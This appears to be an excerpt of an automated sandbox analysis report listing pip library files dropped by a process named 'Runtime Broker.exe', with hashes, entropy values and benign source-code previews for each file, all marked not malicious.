Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	31247
Entropy (8bit):	4.600247600047165
Encrypted:	false
SSDEEP:	384:lACv/VA6MK58dvNT8O1SZcclVBe35gdiHqvcdmXRiCgz/TXhZ:lAu/H2nOcclVBe3ouMAHrXhZ
MD5:	ECBAF0A960F61C7AC70BC6F73775731C
SHA1:	F86D4532DD76256605A8E717990111DD38149DD1
SHA-256:	10D83F41B2DB067C1888FB75973148AD01AED90864102C4A9BDFDD4DA6B3E535
SHA-512:	A7D29DF42ED73BE487E316024224C9788F5B38961EAFE87B104E90BB4D9CD5BE6C696C9D7EE22FE35B976666734D4806D40961D33044B27B0B5B349A6C2D3742
Malicious:	false
Preview:	"""Support for installing and building the "wheel" binary package format.."""..from __future__ import absolute_import..import collections.import compileall.import contextlib.import csv.import importlib.import logging.import os.path.import re.import shutil.import sys.import warnings.from base64 import urlsafe_b64encode.from itertools import chain, starmap.from zipfile import ZipFile..from pip._vendor import pkg_resources.from pip._vendor.distlib.scripts import ScriptMaker.from pip._vendor.distlib.util import get_export_entry.from pip._vendor.six import PY2, ensure_str, ensure_text, itervalues, reraise, text_type.from pip._vendor.six.moves import filterfalse, map..from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_major_minor_version.from pip._internal.models.direct_url import DIRECT_URL_METADATA_NAME, DirectUrl.from pip._internal.models.scheme import SCHEME_KEYS.from pip._internal.utils.filesystem import adjacent_tmp_file, replace.from pip._in

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\operations\prepare.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	22460
Entropy (8bit):	4.4520896935829715
Encrypted:	false
SSDEEP:	384:SMICcSDaJF1BokEuhRUIHPd7T+aaVZd69LZ9bU23EuHDHKp:nCBEurl7raVZ0PHH2p
MD5:	ED86FE92089EFC5358DC23674467E240
SHA1:	707A635491F53D59052ACFE8DA68B25C3E9B211C
SHA-256:	F8C29548C286629A89D32E9F6B582ADDE0EF48A851D192D7655973682FD354DA
SHA-512:	D3C4DBD36CBAD56A035FC22269A063B38EAD38480587770078088B4968A6310F480D2662D3E03218EB27D5B6956D594CEB9E3C59C1E722E31F323853DB13B39F
Malicious:	false
Preview:	"""Prepares a distribution for installation."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import logging.import mimetypes.import os.import shutil..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.six import PY2..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.distributions.installed import InstalledDistribution.from pip._internal.exceptions import (. DirectoryUrlHashUnsupported,. HashMismatch,. HashUnpinned,. InstallationError,. NetworkConnectionError,. PreviousBuildDirError,. VcsHashUnsupported,.).from pip._internal.models.wheel import Wheel.from pip._internal.network.download import BatchDownloader, Downloader.from pip._internal.network.lazy_wheel import (. HTTPRangeRequestUnsupported,. dist_from_wheel_url,.).from pip._internal.utils.filesystem import copy2_fixed.from pip._internal.utils.hashes import MissingHashes.from

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\pyproject.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7400
Entropy (8bit):	4.494999818992657
Encrypted:	false
SSDEEP:	192:Zekd2Y39Z890m5wFyaSgE7QRnREw/dsNiMjg:ZwUf8pwFyBgE7ORANiM8
MD5:	5877102CF2CEB5CF59BEC7A96CDBD3B6
SHA1:	1861E0C05AC42958BB2553B10982F7946BDB2BD9
SHA-256:	0E8433BED3A1E7FC023E953C13E27720308E287BC9C3F48863F808F22878239F
SHA-512:	9EDD44D95BCA5D3B177DF8596BC827638820B994360BA28F6E1D3FBA1360BF28B7D964534262DDEE2C63085212F94158844F1249C06096B14F54CF7301EC36ED
Malicious:	false
Preview:	from __future__ import absolute_import..import io.import os.import sys.from collections import namedtuple..from pip._vendor import six, toml.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement..from pip._internal.exceptions import InstallationError.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, List, Optional...def _is_list_of_str(obj):. # type: (Any) -> bool. return (. isinstance(obj, list) and. all(isinstance(item, six.string_types) for item in obj). )...def make_pyproject_path(unpacked_source_directory):. # type: (str) -> str. path = os.path.join(unpacked_source_directory, 'pyproject.toml').. # Python2 __file__ should not be unicode. if six.PY2 and isinstance(path, six.text_type):. path = path.encode(sys.getfilesystemencoding()).. return path...BuildSystemDetails = namedtuple('BuildSystemDetails', [. 'requires', 'backend', 'check', 'backend_path'.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3133
Entropy (8bit):	4.378227397761261
Encrypted:	false
SSDEEP:	48:PjvZ+z+rK6VtdIkO6hdSWIlNsjm1a/GedCakoZBwZ8tTwH8AXdjW:7Uz+rxxIkRLSWWND1qCakonwKTQjW
MD5:	9FD3C9D0ADF21DCC2926D10A0D523DE0
SHA1:	BF7DD92EA253E4704E8218E526373529AD2972C5
SHA-256:	B3E139571C6AAA972CEF17D8E6063AF681E882C589E2C2DB9D4883A169A41CE5
SHA-512:	833FC74519AA5C7735C34E8687C6F3636C61AF6F6C896C443736B37A94F77E2922D4C7DA51F3D1047468AC70ED746DE5AE5E719170A8B0BA016651D04B24459A
Malicious:	false
Preview:	from __future__ import absolute_import..import collections.import logging..from pip._internal.utils.logging import indent_log.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..from .req_file import parse_requirements.from .req_install import InstallRequirement.from .req_set import RequirementSet..if MYPY_CHECK_RUNNING:. from typing import Iterator, List, Optional, Sequence, Tuple..__all__ = [. "RequirementSet", "InstallRequirement",. "parse_requirements", "install_given_reqs",.]..logger = logging.getLogger(__name__)...class InstallationResult(object):. def __init__(self, name):. # type: (str) -> None. self.name = name.. def __repr__(self):. # type: () -> str. return "InstallationResult(name={!r})".format(self.name)...def _validate_requirements(. requirements, # type: List[InstallRequirement].):. # type: (...) -> Iterator[Tuple[str, InstallRequirement]]. for req in requirements:. assert req.name, "invalid to-be-install

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\constructors.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	16135
Entropy (8bit):	4.513663054978499
Encrypted:	false
SSDEEP:	384:bjPrn+Hs1eHCERbSw9PUpxFZ6eYaN3SQYHSeLtb:b+YObSEBaM/ye5
MD5:	73740CAAEEAD01B4B8B1D6CB22CFBE05
SHA1:	31E7C28283865D862B1A856F10FAF24B3B704087
SHA-256:	D292F0F2AE64A332720147C53421C60B763569C415EC5C6E0FA7FE7D59AB38CA
SHA-512:	99802098A00D3CF6965D8D8E08DD4B6D3220A83CD2DE0FF4CF093409F7D6321C8B3B4C41C59232432F57B9F588A3FF2971BB3E1FF0B6F9EF53509DE21D2E1252
Malicious:	false
Preview:	"""Backing implementation for InstallRequirement's various constructors..The idea here is that these formed a major chunk of InstallRequirement's size.so, moving them and support code dedicated to them outside of that class.helps creates for better understandability for the rest of the code...These are meant to be used elsewhere within pip to create instances of.InstallRequirement.."""..import logging.import os.import re..from pip._vendor.packaging.markers import Marker.from pip._vendor.packaging.requirements import InvalidRequirement, Requirement.from pip._vendor.packaging.specifiers import Specifier.from pip._vendor.pkg_resources import RequirementParseError, parse_requirements..from pip._internal.exceptions import InstallationError.from pip._internal.models.index import PyPI, TestPyPI.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.pyproject import make_pyproject_path.from pip._internal.req.req_install import InstallRequirem

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\req_file.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	18594
Entropy (8bit):	4.492219850880044
Encrypted:	false
SSDEEP:	384:7c122F7ZcksTT3j0AJK1gIDm2IKIC+1wiw5Q+r0FB:7cjZ/QTzUpyt1C+1/5X
MD5:	4FF347FDE322EDD3E6D56A35A1B0A1A5
SHA1:	BF7DB70B20EC2B9F1D1033B2C4605894F82135EB
SHA-256:	7FAD90171B33530375AB5E19FD867719D626F265027B65A80F4AFCB0379B4281
SHA-512:	ECAEEE783F074E7914BB3BA4CCB5023DF14D3201E2140DE72E4F0B51575011C076A3FA547E0E2DF4657B2B21EBD70C6DE2299BD487EF23B5A11970E95BF154F1
Malicious:	false
Preview:	""".Requirements file parsing."""..from __future__ import absolute_import..import optparse.import os.import re.import shlex.import sys..from pip._vendor.six.moves.urllib import parse as urllib_parse..from pip._internal.cli import cmdoptions.from pip._internal.exceptions import InstallationError, RequirementsFileParseError.from pip._internal.models.search_scope import SearchScope.from pip._internal.network.utils import raise_for_status.from pip._internal.utils.encoding import auto_decode.from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.urls import get_url_scheme, url_to_path..if MYPY_CHECK_RUNNING:. from optparse import Values. from typing import (. Any,. Callable,. Dict,. Iterator,. List,. NoReturn,. Optional,. Text,. Tuple,. ).. from pip._internal.index.package_finder import PackageFinder. from pip._internal.network.session import PipSession.. ReqFileLines = Iterator[Tupl

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\req_install.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	33420
Entropy (8bit):	4.347069195508661
Encrypted:	false
SSDEEP:	384:+lIK0BvaLDU2GXEhXVPMTXMLo6zKe0vAtrhfjOcHj:+lwODU2GUhLvzKemk9Ou
MD5:	FED218D73712698966F3417CA8B1E1B5
SHA1:	89C666D1025F8D7DE0E2A40AA3B0DD74600D3F81
SHA-256:	72226C7417F1983DE8C670B313B62003C3BB21070BC4328F961793A83BEEB0BF
SHA-512:	7B6788F7CA585AD2872065D43098A46A6645855552FBCA6509EBEEDF72CE86436697C135B0429A31013C1AB905C89FD0723D8B73D35D0A72479A7E5679BDEF46
Malicious:	false
Preview:	# The following comment should be removed at some point in the future..# mypy: strict-optional=False..from __future__ import absolute_import..import logging.import os.import shutil.import sys.import uuid.import zipfile..from pip._vendor import pkg_resources, six.from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version.from pip._vendor.packaging.version import parse as parse_version.from pip._vendor.pep517.wrappers import Pep517HookCaller..from pip._internal.build_env import NoOpBuildEnvironment.from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_scheme.from pip._internal.models.link import Link.from pip._internal.operations.build.metadata import generate_metadata.from pip._internal.operations.build.metadata_legacy import (. generate_metadata as generate_metadata_legacy,.).from pip._internal.operations.install.editable_legacy import

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\req_set.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7887
Entropy (8bit):	4.351163982669809
Encrypted:	false
SSDEEP:	96:GzklKWw+WcC55J1XKZTqyCw/mUNLd1kzyGGHT94IjmuI0R5f+/JxlJ9SmR4cg:mklw+9m5J16Zl7CJGBbmuI25lcg
MD5:	AAEA27A26C9B4B3DDB91EC5D73B7794C
SHA1:	DCFAA31427865132D8941AB98DAFC49563227DE7
SHA-256:	72C03B37855E946A5FFA8BF215045AC51F574DE024DA3F648991CEE92203C56D
SHA-512:	CD716F395AA0F2D4FD01C072B11C6F254C368E93AA0662B78509E9E678859FA720389E4014FD7FDD89FE100F6F45E88AC071C1DEE3F4DE390E3D68BA78B442BC
Malicious:	false
Preview:	from __future__ import absolute_import..import logging.from collections import OrderedDict..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InstallationError.from pip._internal.models.wheel import Wheel.from pip._internal.utils import compatibility_tags.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Dict, Iterable, List, Optional, Tuple.. from pip._internal.req.req_install import InstallRequirement...logger = logging.getLogger(__name__)...class RequirementSet(object):.. def __init__(self, check_supported_wheels=True):. # type: (bool) -> None. """Create a RequirementSet.. """.. self.requirements = OrderedDict() # type: Dict[str, InstallRequirement] # noqa: E501. self.check_supported_wheels = check_supported_wheels.. self.unnamed_requirements = [] # type: List[InstallRequirement].. def __str__(self):. # type: () -> str.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\req_tracker.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	4691
Entropy (8bit):	4.55561383537028
Encrypted:	false
SSDEEP:	48:PXzkwlOnSrwV1BJbf//gcKo60X7ErMINLKcYZolQrn0b4IHL1LthBUuTnUjdqwZJ:/zkOOi01fvdlq0rnw4y5rTUccuFcp
MD5:	11303D8B1E4ADDA98D3880F1E5D846CB
SHA1:	4D474C78D43AB949170FDEB0B40F5807D9DBFD77
SHA-256:	7D59773E0977CA5D76AC5050202629CB74ADC56C43DE3E690D6AC7A3C4263FB8
SHA-512:	2B59E14DD1BFD09D27FFD06BE549FE6064A0519C007CA26F1FD4D739072E7A5F2F1DA5503530EDB2342B72E6FC5408C4F1AB4A1A592CB7583F2CEB5266BC48A1
Malicious:	false
Preview:	from __future__ import absolute_import..import contextlib.import errno.import hashlib.import logging.import os..from pip._vendor import contextlib2..from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from types import TracebackType. from typing import Dict, Iterator, Optional, Set, Type, Union.. from pip._internal.models.link import Link. from pip._internal.req.req_install import InstallRequirement..logger = logging.getLogger(__name__)...@contextlib.contextmanager.def update_env_context_manager(**changes):. # type: (str) -> Iterator[None]. target = os.environ.. # Save values from the target and change them.. non_existent_marker = object(). saved_values = {} # type: Dict[str, Union[object, str]]. for name, new_value in changes.items():. try:. saved_values[name] = target[name]. except KeyError:. saved_values[name] = non_existent_marker.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\req\req_uninstall.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	23771
Entropy (8bit):	4.35556922259924
Encrypted:	false
SSDEEP:	384:DdOnE5DUHdBEfmhPuWTGqA9TzFoIRQqrlh:DdOnEGDhPjGqozOIR7rlh
MD5:	6B9F9853FDAC797DCB4476FFF2F84973
SHA1:	8980DA379790E8CBFA9F94582E20AAF97313F454
SHA-256:	BEE4F7BD7DF369BDDDF0687EA75020A03869294D4FDCE572B82F1AFF9EC4B385
SHA-512:	DA2900737531BD9FA10D8195180BD21D4B18B54F3EBA2451384689BE66C9A2AEC04B50E8F07796D40726A83FEE40414A45FE17FD648BA4A0FAEAA6C1ABF538CE
Malicious:	false
Preview:	from __future__ import absolute_import..import csv.import functools.import logging.import os.import sys.import sysconfig..from pip._vendor import pkg_resources..from pip._internal.exceptions import UninstallationError.from pip._internal.locations import bin_py, bin_user.from pip._internal.utils.compat import WINDOWS, cache_from_source, uses_pycache.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import (. FakeFile,. ask,. dist_in_usersite,. dist_is_local,. egg_link_path,. is_local,. normalize_path,. renames,. rmtree,.).from pip._internal.utils.temp_dir import AdjacentTempDirectory, TempDirectory.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import (. Any,. Callable,. Dict,. Iterable,. Iterator,. List,. Optional,. Set,. Tuple,. ).. from pip._vendor.pkg_resources import Distribution..logger = logging.getLogger

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\base.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	683
Entropy (8bit):	4.7530161861528635
Encrypted:	false
SSDEEP:	12:1VeiB8f1OvYB16MDgYOMWKiQEi2R3/ugjortFGZGNmfnU6ZKoONfny:1szkvq2UMR3LjorWZGNmPOXPy
MD5:	C8830BCF9424DBC881BAD43F5885B054
SHA1:	F42559590F2B387AD134C0A0A425D7094E236CEF
SHA-256:	31E993432297895AED771B06CEE23B42A05DEC4934C0D1EF0A87B764B64EE3F0
SHA-512:	2F16BAF4157455531D194AE12ABE1D242F9F5ECFF2BA74A826D34A7CF860DA303C02A7979DE9D78836AC9AF72144DDC56D4E18F648C8416152F9BF316BBCE103
Malicious:	false
Preview:	from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Callable, List.. from pip._internal.req.req_install import InstallRequirement. from pip._internal.req.req_set import RequirementSet.. InstallRequirementProvider = Callable[. [str, InstallRequirement], InstallRequirement. ]...class BaseResolver(object):. def resolve(self, root_reqs, check_supported_wheels):. # type: (List[InstallRequirement], bool) -> RequirementSet. raise NotImplementedError().. def get_installation_order(self, req_set):. # type: (RequirementSet) -> List[InstallRequirement]. raise NotImplementedError().

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\legacy\resolver.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	18234
Entropy (8bit):	4.334999816930338
Encrypted:	false
SSDEEP:	192:4OyeUNkDdBZWLydg8j/Heu4q0KHMCsZvEDp3UErGiGfQ0zpteT1rCrxZYtLzyPQW:4N5udwag88q0KHMCAEyiG89wZUz7lM
MD5:	93380ECFC6FFE6FAA27B6B5DE188E8D4
SHA1:	948D7D219AFCF3A7AE442626AA36E5F226B2ABCC
SHA-256:	E1A2EF2D9B74FC13C72DA44E125F488C48736BD09989AF0F2C796F65F3143284
SHA-512:	DC56831D95F8EAA94A5E60E1CC1DB0632A0E73DDEC79E0D891D1FCFF9904DDC4798ACD521BC99856EC49683CC394779D6751DD52FB7FA1967EC07533649543E4
Malicious:	false
Preview:	"""Dependency Resolution..The dependency resolution in pip is performed as follows:..for top-level requirements:. a. only one spec allowed per project, regardless of conflicts or not.. otherwise a "double requirement" exception is raised. b. they override sub-dependency requirements..for sub-dependencies. a. "first found, wins" (where the order is breadth first)."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False.# mypy: disallow-untyped-defs=False..import logging.import sys.from collections import defaultdict.from itertools import chain..from pip._vendor.packaging import specifiers..from pip._internal.exceptions import (. BestVersionAlreadyInstalled,. DistributionNotFound,. HashError,. HashErrors,. UnsupportedPythonVersion,.).from pip._internal.req.req_install import check_invalid_constraint_type.from pip._internal.req.req_set import RequirementSet.from pip._internal.resolution.base import BaseResolver

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\base.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5061
Entropy (8bit):	4.607232394136536
Encrypted:	false
SSDEEP:	96:2Ozkg/apKotKTMu7Dr526dxwRhUdvdstXT6Vt4NwRhlJpKHBtX57IZtCXt9w2:2OkjcMUDr526d7nCOoWSas95
MD5:	23345EFFAB9B1261A9952D0ED8BBEFD2
SHA1:	842410E9921AB517F0231AF9E07381DE558CF1C7
SHA-256:	2B0F2D07D43B6D89493C86664786C6191AEE938494F62A39767CEC851551BC8E
SHA-512:	963AC66329DCDBC18F89F01AC94251E0E83EF490994C3B000329ABCB8FF242C6D816D046F6FD51F1B7C0F11D788DE449770A8BF7253AEA424C77F77EF1458C8D
Malicious:	false
Preview:	from pip._vendor.packaging.specifiers import SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import FrozenSet, Iterable, Optional, Tuple.. from pip._vendor.packaging.version import _BaseVersion.. from pip._internal.models.link import Link.. CandidateLookup = Tuple[. Optional["Candidate"],. Optional[InstallRequirement],. ]...def format_name(project, extras):. # type: (str, FrozenSet[str]) -> str. if not extras:. return project. canonical_extras = sorted(canonicalize_name(e) for e in extras). return "{}[{}]".format(project, ",".join(canonical_extras))...class Constraint(object):. def __init__(self, specifier, hashes):. # type: (SpecifierSet, Hashes) -> None. self.specifier = specifier. self.hash

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\candidates.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	20303
Entropy (8bit):	4.466376886732695
Encrypted:	false
SSDEEP:	192:UeDLdg54syethTnd3p8OJAWlPIybAlZ4VgGdXmsy1LGQvdL2D5WD81WW9:UeuBbfrd3pvnm0mseDdylWD81WW9
MD5:	7BAA28837BFCFFD2E9DF2715D8B3FBE1
SHA1:	75A2E584A68C39B78A13F7219C66D960529C91C7
SHA-256:	1E5F8EF4306769CF93620BD47817304A1B2486D8BD16303DFB87AAB61D886085
SHA-512:	712D552D5D5578237419B36930E3331A011E8BED2959F9C95720F1AAC3268B61F12FF9F150D2B65C479401E3D4162363A12EDD16D4B26AED18BBFBAF300AB0F4
Malicious:	false
Preview:	import logging.import sys..from pip._vendor.packaging.specifiers import InvalidSpecifier, SpecifierSet.from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import HashError, MetadataInconsistent.from pip._internal.models.wheel import Wheel.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.misc import dist_is_editable, normalize_version_info.from pip._internal.utils.packaging import get_requires_python.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..from .base import Candidate, format_name..if MYPY_CHECK_RUNNING:. from typing import Any, FrozenSet, Iterable, Optional, Tuple, Union.. from pip._vendor.packaging.version import _BaseVersion. from pip._vendor.pkg_resources import Distribution.. from pip._internal.models.link import Link.. from

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\factory.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	17098
Entropy (8bit):	4.321831437150363
Encrypted:	false
SSDEEP:	192:ypk0DVLDr4Wxe/VbdMp2n/uzaAXyx+ZP2RaCHOvzCCQz5YvHdjLhIad:idpDhgVbdMpU/uzaoyueaCsOzmvHdRbd
MD5:	C7DBE4F7007B57FD10D1BFD3E86A2818
SHA1:	9206724888B4E71127249A6EE48996D16A088E2A
SHA-256:	6DF4228E572D9626682410831C85CA44363F95F8DD67A84DA8221E15B880D5B4
SHA-512:	FD22C5532B5461F4C7661AE0D8839B13CDF59A5FA25774DAC9472F7EF7EB9332C82F0D453C6173668453CB35717A8565C5D9CF540AB73BEDC42FA0D974B2DC19
Malicious:	false
Preview:	import logging..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import (. DistributionNotFound,. InstallationError,. UnsupportedPythonVersion,. UnsupportedWheel,.).from pip._internal.models.wheel import Wheel.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.compatibility_tags import get_supported.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.misc import (. dist_in_site_packages,. dist_in_usersite,. get_installed_distributions,.).from pip._internal.utils.typing import MYPY_CHECK_RUNNING.from pip._internal.utils.virtualenv import running_under_virtualenv..from .base import Constraint.from .candidates import (. AlreadyInstalledCandidate,. EditableCandidate,. ExtrasCandidate,. LinkCandidate,. RequiresPythonCandidate,.).from .found_candidates import FoundCandidates.from .requirements import (. ExplicitRequirement,. RequiresPythonRequirement,. Sp

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\found_candidates.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3565
Entropy (8bit):	4.511277238191097
Encrypted:	false
SSDEEP:	96:ozkgtsXsaZCTcb0DxPaSXsPLxeqqJE3kimjtv+IfeQ7PqHTvrNQ7RL:kkgOxgPE7Q70xQ79
MD5:	158804BC5DF25EDEF5E4355361CBC0B4
SHA1:	3A18E150B465C74FC7BA71D168991B48C7DD351D
SHA-256:	5EA5B5BAE7FEEA0B3FBBCCCE2D749638C799124F7F0E33CAF84F486950BF4ABF
SHA-512:	92FCF34E0B213C00D5DD8A14AE87670DC25B036A8DD9F310FC59A1B7E31164FF972698FA958D052C3F51DBAD6A5BE824A7EF7BDA5FDEE98E098243783048489C
Malicious:	false
Preview:	import itertools.import operator..from pip._vendor.six.moves import collections_abc # type: ignore..from pip._internal.utils.compat import lru_cache.from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Callable, Iterator, Optional, Set.. from pip._vendor.packaging.version import _BaseVersion.. from .base import Candidate...def _deduplicated_by_version(candidates):. # type: (Iterator[Candidate]) -> Iterator[Candidate]. returned = set() # type: Set[_BaseVersion]. for candidate in candidates:. if candidate.version in returned:. continue. returned.add(candidate.version). yield candidate...def _insert_installed(installed, others):. # type: (Candidate, Iterator[Candidate]) -> Iterator[Candidate]. """Iterator for ``FoundCandidates``... This iterator is used when the resolver prefers to upgrade an. already-installed package. Candidates from index are returned in their. normal ord

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\provider.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	7339
Entropy (8bit):	4.416658554978155
Encrypted:	false
SSDEEP:	192:Ps2xqlrlCanGYiyXihJcwypAjS7TQYycpD9e:PmTGAgJciDRcpxe
MD5:	455EA0613A55BD19EE8A9189852A5787
SHA1:	E49E04998A8722995269266C12EC8133943A4DEE
SHA-256:	6C54B5FB1515F4FCF50DE7EB0CD7C56929418CCEFCE5FB73A098BF7D76F37628
SHA-512:	DB73476BC51E27AF1F9D14AA72EFCE4508CB8971BBE15A05C7AE5D7533D667FB70C39F71F91C9193D9AA58ACBD85C640877DC12ABD6EEE4701BE6D8A5C7F40E8
Malicious:	false
Preview:	from pip._vendor.resolvelib.providers import AbstractProvider..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..from .base import Constraint..if MYPY_CHECK_RUNNING:. from typing import Any, Dict, Iterable, Optional, Sequence, Set, Tuple, Union.. from .base import Candidate, Requirement. from .factory import Factory..# Notes on the relationship between the provider, the factory, and the.# candidate and requirement classes..#.# The provider is a direct implementation of the resolvelib class. Its role.# is to deliver the API that resolvelib expects..#.# Rather than work with completely abstract "requirement" and "candidate".# concepts as resolvelib does, pip has concrete classes implementing these two.# ideas. The API of Requirement and Candidate objects are defined in the base.# classes, but essentially map fairly directly to the equivalent provider.# methods. In particular, `find_matches` and `is_satisfied_by` are.# requirement methods, and `get_dependencies` is a can

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\reporter.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2857
Entropy (8bit):	4.546341813452315
Encrypted:	false
SSDEEP:	48:ooLzkTuWs95QsjcNIzicNIzvma00Low8ghx9DAr9DVesPOs0scxhFLow8gh2mrwF:ooLzkTuWSQacpcIxcwRhrsU3RscxhFcZ
MD5:	82C2B255D87A72AB482D9F7C3A2C111E
SHA1:	25C95AE318D5322ECBD6CBBF213C78DE5B55CB65
SHA-256:	770E0ADB0D26EC7120C45177AFAD2FA13AC50C33F28412CDF2BCF0E1C4176A8A
SHA-512:	F06211B56D8A02A9228AA19830D74E993D90FBBF9D121323180B6D3C4880FF2112FD4F350C6F2496BDFE6FA6A33E9BBE98EA039698054EA5C49030ECFEC94100
Malicious:	false
Preview:	from collections import defaultdict.from logging import getLogger..from pip._vendor.resolvelib.reporters import BaseReporter..from pip._internal.utils.typing import MYPY_CHECK_RUNNING..if MYPY_CHECK_RUNNING:. from typing import Any, DefaultDict.. from .base import Candidate, Requirement...logger = getLogger(__name__)...class PipReporter(BaseReporter):.. def __init__(self):. # type: () -> None. self.backtracks_by_package = defaultdict(int) # type: DefaultDict[str, int].. self._messages_at_backtrack = {. 1: (. "pip is looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.". ),. 8: (. "pip is looking at multiple versions of {package_name} to ". "determine which version is compatible with other ". "requirements. This could take a while.".

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\pip\_internal\resolution\resolvelib\requirements.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	5020
Entropy (8bit):	4.467483638241592
Encrypted:	false
SSDEEP:	96:Hz+oipKj5wRhsRebl1ybWoikuoikAkrJpKlowRhw6eEKWxhxbJpK7wRh5SojpfWZ:T+tBZIazVT2YJb6n5
MD5:	0848B2CE3E6F03A9C622029E42964647
SHA1:	4B09276B9924A11B7BDD3F89B03EF5E51867737C
SHA-256:	F4BA0345C1C06F4744F511162A90BFCDA9172A73699D01286F6E1BD8CBD6B33C
SHA-512:	72EC0E64E0ADD3991A56A7251E3418A11E2329CA565449EE8766500FEA154251B5078548EA7DA3D87283E7FC0F6985FDDB3C91FA2166D01B9E3446B0824AB3E2
Malicious:	false
